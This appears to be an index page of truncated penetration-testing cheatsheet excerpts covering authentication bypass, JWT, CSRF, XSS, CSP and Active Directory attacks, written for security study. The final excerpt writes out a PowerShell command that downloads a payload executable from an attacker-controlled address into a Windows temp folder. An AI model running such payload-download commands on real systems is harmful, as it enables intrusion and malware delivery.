Introduction Authentication bypass vulnerabilities allow attackers to gain unauthorized access to systems by circumventing authentication mechanisms. This cheatsheet covers common techniques used ...

Introduction Access control is the process of granting or denying specific requests to obtain and use information and related information processing services. It is a fundamental component of secu...

Introduction to JWT JSON Web Tokens (JWTs) are an open standard (RFC 7519) for securely transmitting information between parties as a compact, self-contained JSON object. JWTs are commonly used fo...

Introduction Content Security Policy (CSP) and Same-Origin Policy (SOP) are critical web security mechanisms designed to prevent various attacks including Cross-Site Scripting (XSS) and data theft...

Introduction Cross-Site Request Forgery (CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions they did not intend to perform. It exploits the trust a we...

Introduction Cross-Site Scripting (XSS) is a client-side injection vulnerability that allows attackers to execute malicious JavaScript in victims’ browsers. This cheatsheet covers various XSS type...

Introduction Active Directory (AD) enumeration is a crucial phase during penetration testing that involves gathering information about the AD infrastructure, including domains, users, groups, comp...

Introduction This cheatsheet focuses on initial access vectors for breaching Active Directory environments. These techniques target the perimeter of an AD forest, allowing attackers to gain that c...

Core Concepts What is Active Directory? Active Directory (AD) is Microsoft’s directory service for Windows domain networks. It stores information about network objects (like users, computers, prin...

PowerShell HTTP Transfers Download Files # Basic file download Invoke-WebRequest -Uri "http://10.10.10.1:8000/payload.exe" -OutFile "C:\Windows\Temp\payload.exe" # Download with System.Net.WebCli...